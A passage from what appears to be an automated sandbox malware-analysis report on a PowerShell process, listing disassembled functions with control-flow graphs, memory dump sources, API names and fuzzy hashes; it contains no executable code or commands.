153->158 162 7ae3e66-7ae3e68 157->162 160 7ae3e4d-7ae3e59 158->160 161 7ae3e4b 158->161 160->157 161->157 162->163
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$4'fq$4'fq
                                                                                          • API String ID: 0-359900465
                                                                                          • Opcode ID: b8b41ac0b87c4fc93d4cabb827c7d1222d20cda7aaa16d16ff519d2d76a0cb60
                                                                                          • Instruction ID: 40618226b907a9df25daa2cb13339baaf3b54c94f804a087d85ac9e676cc974c
                                                                                          • Opcode Fuzzy Hash: b8b41ac0b87c4fc93d4cabb827c7d1222d20cda7aaa16d16ff519d2d76a0cb60
                                                                                          • Instruction Fuzzy Hash: 1C1247B1B04246CFCF259B78881176ABFBA9FC5314F1480BAE565CB641DB35CC41CBA1
                                                                                          Function 07AE2308 Relevance: 4.4, Strings: 3, Instructions: 629COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$|,j
                                                                                          • API String ID: 0-1469847931
                                                                                          • Opcode ID: 069c274a6e2b6ac688879ad02054fd7d091ff6a5645d2699a1fd8d04378264f0
                                                                                          • Instruction ID: 59d1c848b9d8bb80b1b8743247881d396089ac3c7c5c68614ddfd939bb3653c7
                                                                                          • Opcode Fuzzy Hash: 069c274a6e2b6ac688879ad02054fd7d091ff6a5645d2699a1fd8d04378264f0
                                                                                          • Instruction Fuzzy Hash: 9A2205B1B006068FCB249BA8885176ABBFDFFC5311F14807AE525DB291DB35D941CBA2
                                                                                          Function 08C5688F Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 439 8c5688f-8c568cb 440 8c568d3-8c568ff SetThreadToken 439->440 441 8c56901-8c56907 440->441 442 8c56908-8c56925 440->442 441->442
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1876752021.0000000008C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_8c50000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3254676861-0
                                                                                          • Opcode ID: 063e21836b28d15f54e9585876e3aaa6e18008b7697d5c25fb14526422d12fc9
                                                                                          • Instruction ID: c43d4d7fda65cbe02e881d99cfd3c0589ed22ab23934ee1930ba03611233f4d1
                                                                                          • Opcode Fuzzy Hash: 063e21836b28d15f54e9585876e3aaa6e18008b7697d5c25fb14526422d12fc9
                                                                                          • Instruction Fuzzy Hash: 7C1113B59002488FCB10CF9EC584BDEFBF4AB88320F24845AD459A7310C774A944CFA1
                                                                                          Function 08C56890 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 445 8c56890-8c568ff SetThreadToken 447 8c56901-8c56907 445->447 448 8c56908-8c56925 445->448 447->448
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1876752021.0000000008C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_8c50000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3254676861-0
                                                                                          • Opcode ID: a310435b5e17fb04c889e25811b86be60faf0d5506846cc7056d32bb3d4549a4
                                                                                          • Instruction ID: f0a309fc70d48b825a8df7e24ddde2a33fd7c23eeee6f8934a930928164a8568
                                                                                          • Opcode Fuzzy Hash: a310435b5e17fb04c889e25811b86be60faf0d5506846cc7056d32bb3d4549a4
                                                                                          • Instruction Fuzzy Hash: 8E11F5B59002498FCB10DF9EC984B9EFBF8EB88324F24845AD458A7350D774A944CFA5
                                                                                          Function 04C66FC8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 451 4c66fc8-4c66fe7 452 4c670ed-4c6712b 451->452 453 4c66fed-4c66ff0 451->453 479 4c66ff2 call 4c67664 453->479 480 4c66ff2 call 4c6767f 453->480 454 4c66ff8-4c6700a 456 4c67016-4c6702b 454->456 457 4c6700c 454->457 463 4c670b6-4c670cf 456->463 464 4c67031-4c67041 456->464 457->456 469 4c670d1 463->469 470 4c670da 463->470 465 4c67043 464->465 466 4c6704d-4c6705b call 4c6bf10 464->466 465->466 472 4c67061-4c67065 466->472 469->470 470->452 473 4c67067-4c67077 472->473 474 4c670a5-4c670b0 472->474 475 4c67093-4c6709d 473->475 476 4c67079-4c67091 473->476 474->463 474->464 475->474 476->474 479->454 480->454
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (jq
                                                                                          • API String ID: 0-3225323518
                                                                                          • Opcode ID: 1fd79861bbdeaee6e6a49353d2bf84a9d37f2cca3d0e99bffc144a55ae970718
                                                                                          • Instruction ID: e766b4d4d9341a2755400cf6f2e77c2dd9be124f8b716cf7e8dbba775270c3fa
                                                                                          • Opcode Fuzzy Hash: 1fd79861bbdeaee6e6a49353d2bf84a9d37f2cca3d0e99bffc144a55ae970718
                                                                                          • Instruction Fuzzy Hash: 21415134B042058FDB14DFA8C594AAD7BF2EF8D315F148499D406AB391DB35ED01CB61
                                                                                          Function 04C6AF98 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 482 4c6af98-4c6af9f 483 4c6afa6-4c6afaa 482->483 484 4c6afa1 call 4c6a984 482->484 485 4c6afac-4c6afb9 483->485 486 4c6afba-4c6b055 483->486 484->483 493 4c6b057-4c6b05d 486->493 494 4c6b05e-4c6b07b 486->494 493->494
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (&fq
                                                                                          • API String ID: 0-1822945044
                                                                                          • Opcode ID: b74a9d6d3de4fd4ba5d9645444a21b134e998cc4cf11740e48ac670fee6caba9
                                                                                          • Instruction ID: ca822f5b7fdfb3b7bf7feed89c55d8808e0f2944f7b22a02d7fff19f27dc7900
                                                                                          • Opcode Fuzzy Hash: b74a9d6d3de4fd4ba5d9645444a21b134e998cc4cf11740e48ac670fee6caba9
                                                                                          • Instruction Fuzzy Hash: CA21B5B5A042588FCB14DFAED540B9EBFF6EF89320F14846ED019E7340CA75A905CBA5
                                                                                          Function 04C6DC88 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 497 4c6dc88-4c6dcad 499 4c6dcb6 497->499 500 4c6dcaf 497->500 501 4c6dcbe-4c6dcc8 499->501 500->499 503 4c6dcca call 4c6dce8 501->503 504 4c6dcca call 4c6dcd9 501->504 502 4c6dcd0-4c6dcd3 503->502 504->502
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: +/m^
                                                                                          • API String ID: 0-3130925741
                                                                                          • Opcode ID: 572d6aa7a7e4d61ee88baa589bf50ca2929740af0c8a262f288ca1bdbe03836e
                                                                                          • Instruction ID: 2b5d220b570ed75ce4103b2e18701115e9eef6542968d6cf2f39ba30646180a8
                                                                                          • Opcode Fuzzy Hash: 572d6aa7a7e4d61ee88baa589bf50ca2929740af0c8a262f288ca1bdbe03836e
                                                                                          • Instruction Fuzzy Hash: FFF0E53570AB906BC316D72DA96089F7FA69EC3130315449ED087CF352CEA8D90587F6
                                                                                          Function 04C6DC98 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 505 4c6dc98-4c6dcad 507 4c6dcb6-4c6dcc8 505->507 508 4c6dcaf 505->508 511 4c6dcca call 4c6dce8 507->511 512 4c6dcca call 4c6dcd9 507->512 508->507 510 4c6dcd0-4c6dcd3 511->510 512->510
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: +/m^
                                                                                          • API String ID: 0-3130925741
                                                                                          • Opcode ID: 389e00cf8febb6eb72776b1ff19800a8914fcbe4082678d51a2f66bdede7ac1f
                                                                                          • Instruction ID: 8c7fb2355bf264e24ce2c1e1c426abfc658e21d07862cfea580c74c374dbd4f0
                                                                                          • Opcode Fuzzy Hash: 389e00cf8febb6eb72776b1ff19800a8914fcbe4082678d51a2f66bdede7ac1f
                                                                                          • Instruction Fuzzy Hash: 71E0C275700B14678315AA5EB85085F7BDBDFC4671310842EE00BCB340DE68ED0147E5
                                                                                          Function 04C6E7B8 Relevance: .3, Instructions: 254COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 586 4c6e7b8-4c6e7d8 587 4c6e7e1-4c6e7ee 586->587 588 4c6e7da-4c6e7dc 586->588 591 4c6e7f0-4c6e801 587->591 589 4c6eb41-4c6eb48 588->589 593 4c6e803-4c6e825 call 4c6014c 591->593 598 4c6e82b 593->598 599 4c6e988-4c6e99f 593->599 600 4c6e82d-4c6e83e 598->600 607 4c6e9a5 599->607 608 4c6ea7b-4c6ea87 599->608 603 4c6e840-4c6e842 600->603 605 4c6e844-4c6e84a 603->605 606 4c6e85c-4c6e8e5 603->606 609 4c6e84e-4c6e85a 605->609 610 4c6e84c 605->610 635 4c6e8e7 606->635 636 4c6e8ec-4c6e921 606->636 611 4c6e9a7-4c6e9b8 607->611 614 4c6ea8d-4c6eaa4 608->614 615 4c6eb39 608->615 609->606 610->606 619 4c6e9ba-4c6e9bc 611->619 614->615 630 4c6eaaa 614->630 615->589 621 4c6e9d6-4c6ea0e 619->621 622 4c6e9be-4c6e9c4 619->622 639 4c6ea15-4c6ea4a 621->639 640 4c6ea10 621->640 624 4c6e9c6 622->624 625 4c6e9c8-4c6e9d4 622->625 624->621 625->621 632 4c6eaac-4c6eabd 630->632 638 4c6eabf-4c6eac1 632->638 635->636 654 4c6e923 636->654 655 4c6e92b 636->655 641 4c6eac3-4c6eac9 638->641 642 4c6eadb-4c6eb09 638->642 656 4c6ea54 639->656 657 4c6ea4c 639->657 640->639 644 4c6eacd-4c6ead9 641->644 645 4c6eacb 641->645 660 4c6eb35-4c6eb37 642->660 661 4c6eb0b-4c6eb16 642->661 644->642 645->642 654->655 655->599 656->608 657->656 660->589 666 4c6eb19 call 4c6ea57 661->666 667 4c6eb19 call 4c6e92e 661->667 668 4c6eb19 call 4c6e7a8 661->668 669 4c6eb19 call 4c6e7b8 661->669 663 4c6eb1f-4c6eb33 663->660 663->661 666->663 667->663 668->663 669->663
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 32b63a58830745604472e460367e23d43cddbab2f452870c0e4c3becc85d3478
                                                                                          • Instruction ID: 765f3f4f0a739980f764508002752fc4f7f0f667611c28a9e8ac96100fe98c6f
                                                                                          • Opcode Fuzzy Hash: 32b63a58830745604472e460367e23d43cddbab2f452870c0e4c3becc85d3478
                                                                                          • Instruction Fuzzy Hash: 44912B78B102148FCB24DF79D5945AEBBF6AF88710B15846AE806EB355DF30ED41CB90
                                                                                          Function 04C629F0 Relevance: .2, Instructions: 207COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 670 4c629f0-4c62a1e 671 4c62a24-4c62a3a 670->671 672 4c62af5-4c62b37 670->672 675 4c62a3f-4c62a52 671->675 676 4c62a3c 671->676 677 4c62c51-4c62c61 672->677 678 4c62b3d-4c62b56 672->678 675->672 683 4c62a58-4c62a65 675->683 676->675 679 4c62b5b-4c62b69 678->679 680 4c62b58 678->680 679->677 687 4c62b6f-4c62b79 679->687 680->679 684 4c62a67 683->684 685 4c62a6a-4c62a7c 683->685 684->685 685->672 692 4c62a7e-4c62a88 685->692 689 4c62b87-4c62b94 687->689 690 4c62b7b-4c62b7d 687->690 689->677 691 4c62b9a-4c62baa 689->691 690->689 693 4c62baf-4c62bbd 691->693 694 4c62bac 691->694 695 4c62a96-4c62aa6 692->695 696 4c62a8a-4c62a8c 692->696 693->677 701 4c62bc3-4c62bd3 693->701 694->693 695->672 697 4c62aa8-4c62ab2 695->697 696->695 699 4c62ab4-4c62ab6 697->699 700 4c62ac0-4c62af4 697->700 699->700 702 4c62bd5 701->702 703 4c62bd8-4c62be5 701->703 702->703 703->677 707 4c62be7-4c62bf7 703->707 708 4c62bfc-4c62c08 707->708 709 4c62bf9 707->709 708->677 711 4c62c0a-4c62c24 708->711 709->708 712 4c62c26 711->712 713 4c62c29 711->713 712->713 714 4c62c2e-4c62c38 713->714 715 4c62c3d-4c62c50 714->715
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a07fa5776844abaa0ebba0d43cf249714e9595e9dc533229e5ded2d85a3d37fc
                                                                                          • Instruction ID: e58c3f12a06a702f0a0f466823b2a9db0f7483699b3819eef3bb39611d24f614
                                                                                          • Opcode Fuzzy Hash: a07fa5776844abaa0ebba0d43cf249714e9595e9dc533229e5ded2d85a3d37fc
                                                                                          • Instruction Fuzzy Hash: E2916A74A006059FCB15CF59C4D49AEFBB2FF88310B2486A9D816AB3A5C735FC51CBA0
                                                                                          Function 04C6BAB0 Relevance: .2, Instructions: 159COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 852 4c6bab0-4c6bab8 853 4c6baba-4c6bae5 852->853 854 4c6baeb-4c6bb50 852->854 853->854 858 4c6bb56-4c6bb61 854->858 859 4c6bb52 854->859 860 4c6bb66-4c6bbc0 call 4c6af98 858->860 861 4c6bb63 858->861 859->858 868 4c6bbc2-4c6bbc7 860->868 869 4c6bc11-4c6bc15 860->869 861->860 868->869 872 4c6bbc9-4c6bbec 868->872 870 4c6bc26 869->870 871 4c6bc17-4c6bc21 869->871 873 4c6bc2b-4c6bc2d 870->873 871->870 876 4c6bbf2-4c6bbfd 872->876 874 4c6bc52-4c6bc55 call 4c6a978 873->874 875 4c6bc2f-4c6bc50 873->875 881 4c6bc5a-4c6bc5e 874->881 875->881 878 4c6bc06-4c6bc0f 876->878 879 4c6bbff-4c6bc05 876->879 878->873 879->878 882 4c6bc97-4c6bcc6 881->882 883 4c6bc60-4c6bc89 881->883 883->882
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c065af597a2a0bd71f8b9beac5d5b13369c8986cc398bac1e2adf5d81f3d22ba
                                                                                          • Instruction ID: 76d4e46f7f1445c9009ffdfa493d35dc33c9fac92aedeb913c38e4082911d8fb
                                                                                          • Opcode Fuzzy Hash: c065af597a2a0bd71f8b9beac5d5b13369c8986cc398bac1e2adf5d81f3d22ba
                                                                                          • Instruction Fuzzy Hash: 23614774E002589FCB14CFA9C584A8DBFF2EF88310F15806AE81AEB355EB34AD41CB50
                                                                                          Function 04C67728 Relevance: .2, Instructions: 156COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6cd400441143c30996d808f4bee874048053dd5d95de41be39a324c83fa0ce8
                                                                                          • Instruction ID: f4951f8b1d10435a752504d18552c49b3461273552acfb1fd6f1afdafceb4dca
                                                                                          • Opcode Fuzzy Hash: f6cd400441143c30996d808f4bee874048053dd5d95de41be39a324c83fa0ce8
                                                                                          • Instruction Fuzzy Hash: 6251B1347052059FD705DB79D884A2A7BE7FFC9318B1888A9E50ADB351EB35EC01CBA1
                                                                                          Function 04C6BAC0 Relevance: .2, Instructions: 155COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d961a0add44255d9ab491a71bcc20f7bbe8faf271e42484ee3e2fe51cd20f6ba
                                                                                          • Instruction ID: a08298d78da18b704174cd0d65c010933afb3e64d41b24cb041c99c66d08c4a3
                                                                                          • Opcode Fuzzy Hash: d961a0add44255d9ab491a71bcc20f7bbe8faf271e42484ee3e2fe51cd20f6ba
                                                                                          • Instruction Fuzzy Hash: 39611671E00258DFCB14DFA9D584A9DBBF6FF88310F15812AE819AB354EB34AD41CB61
                                                                                          Function 04C6E419 Relevance: .1, Instructions: 139COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8595889a3b04320853fb1d380748ffd467c095236a43bb8aaf78b2a1a72bee9d
                                                                                          • Instruction ID: 229eadd0740beae55b8e90abeaaff3df125c37cefc7fbd645ef232bfbd7ade79
                                                                                          • Opcode Fuzzy Hash: 8595889a3b04320853fb1d380748ffd467c095236a43bb8aaf78b2a1a72bee9d
                                                                                          • Instruction Fuzzy Hash: A9415A787002018FCB14DFACC5D892ABBE6EF89310715C5AAE55ACF352EB34ED019B91
                                                                                          Function 04C6E428 Relevance: .1, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 28698ba3886888050a1d2dbca6c36303cc315e5d5a4878704e2ade7e13539c40
                                                                                          • Instruction ID: 62f5bd3a7b0983c7ea2b06c73883ec289aa76b94fe9df4c14f8b83668be02be6
                                                                                          • Opcode Fuzzy Hash: 28698ba3886888050a1d2dbca6c36303cc315e5d5a4878704e2ade7e13539c40
                                                                                          • Instruction Fuzzy Hash: 54415B787002058FCB10DFACC5D892ABBE6EF89310715C469E55ACF351EB34ED019B91
                                                                                          Function 07AE3CCC Relevance: .1, Instructions: 123COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 23b69221f6e93c42dfc7db46f8773aff174115fde42e2eb4e5c9206b91147393
                                                                                          • Instruction ID: ab0c2b6c1e2da8ea816ad900946ff23d51eb010fd9e9cef08919b02e2fd62d50
                                                                                          • Opcode Fuzzy Hash: 23b69221f6e93c42dfc7db46f8773aff174115fde42e2eb4e5c9206b91147393
                                                                                          • Instruction Fuzzy Hash: 7E41F1F1A00202DBCF359B28C541676BBFAAFC1344F1884A6D9209B251D735DC85CBA1
                                                                                          Function 04C6E610 Relevance: .1, Instructions: 107COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 42bf558487f1207ef8220101ade16ad76ec9e9daa73a26e95adefee799a7fa9a
                                                                                          • Instruction ID: 41d5a424a831025beeb3274e463548fca481b47aa3ad1ad84102515781354384
                                                                                          • Opcode Fuzzy Hash: 42bf558487f1207ef8220101ade16ad76ec9e9daa73a26e95adefee799a7fa9a
                                                                                          • Instruction Fuzzy Hash: 9E41CC34A002458FCB19DF78D594A9EBBF2FF49308F14856EE416AB391CB34AD05CBA1
                                                                                          Function 04C62B00 Relevance: .1, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2326cc73ab13680c43b116807ec16c4040d24153642bebd0717c057a46eeb3ba
                                                                                          • Instruction ID: 9f44d0e32061ff36ce86d7dc105ffcdab6dddead4de6b987d7728e857000cdf4
                                                                                          • Opcode Fuzzy Hash: 2326cc73ab13680c43b116807ec16c4040d24153642bebd0717c057a46eeb3ba
                                                                                          • Instruction Fuzzy Hash: B84127B4A006059FCB09CF59C5D89AEFBB2FF48310B158699D816AB364C732FD51CBA0
                                                                                          Function 04C66FA0 Relevance: .1, Instructions: 104COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 55158ffd0bb203c0667482bcb175315b313f626810b63c7cfc48550fa797124a
                                                                                          • Instruction ID: d177c8c3a9625f62c00a5a9581a3b9cd089eb666cdfef247679f44a362637e8e
                                                                                          • Opcode Fuzzy Hash: 55158ffd0bb203c0667482bcb175315b313f626810b63c7cfc48550fa797124a
                                                                                          • Instruction Fuzzy Hash: F1419374B052458FCB14CFA4C5949ADBFF2AF8E314F188499D846AB392DB32DD41CB61
                                                                                          Function 04C6C388 Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 889af3b5b45fae0cefe94368404aca4272c5d70e3bd3c4ff01c376433de9b664
                                                                                          • Instruction ID: 96a0a59b5a7b759430e88ffd0b4c75a43de0bc72eadd7a751202472d23b38c13
                                                                                          • Opcode Fuzzy Hash: 889af3b5b45fae0cefe94368404aca4272c5d70e3bd3c4ff01c376433de9b664
                                                                                          • Instruction Fuzzy Hash: 2531BE353002019FC708DB78E884BAAB7A2EFC4314F008939E50ACB351DF74A845CBA1
                                                                                          Function 04C6AE60 Relevance: .1, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 59f50142d7e98d0cbeb0483c745a5fd0bcdc33fb2155e34fb7eea88bcfc6a509
                                                                                          • Instruction ID: d0c42f7ba5263fff1984259aa8ad3e868237fdc57d9419b7f71e5110bdc476f7
                                                                                          • Opcode Fuzzy Hash: 59f50142d7e98d0cbeb0483c745a5fd0bcdc33fb2155e34fb7eea88bcfc6a509
                                                                                          • Instruction Fuzzy Hash: E3316C70E006099FDB04DFB9D4946AEBBF2EF89310F15802DE406EB355EB75AC418B51
                                                                                          Function 04C6AD28 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0261fbf2c6e2a662590c2aa0e9e60f11d913b01a2af82986fb2ae21efaac0642
                                                                                          • Instruction ID: 35176789c2b87093865ef83c03e56725c1a61fcff88129056a35f14059c1d744
                                                                                          • Opcode Fuzzy Hash: 0261fbf2c6e2a662590c2aa0e9e60f11d913b01a2af82986fb2ae21efaac0642
                                                                                          • Instruction Fuzzy Hash: 40319EB8E042459FDB04DFA4D894AAE7BB2EF85300F1184A9D115AF3A5CB799D41CF60
                                                                                          Function 04C6AE70 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7bb1fd125f8ed5d6ff5a42ffb6eaafd8c5bade20f18a15172715399cd085bb36
                                                                                          • Instruction ID: 25aef2d50d43d58114abc8c8e7d5eb4e76db3e5e32fbaaf9a0371daf0aab3fc8
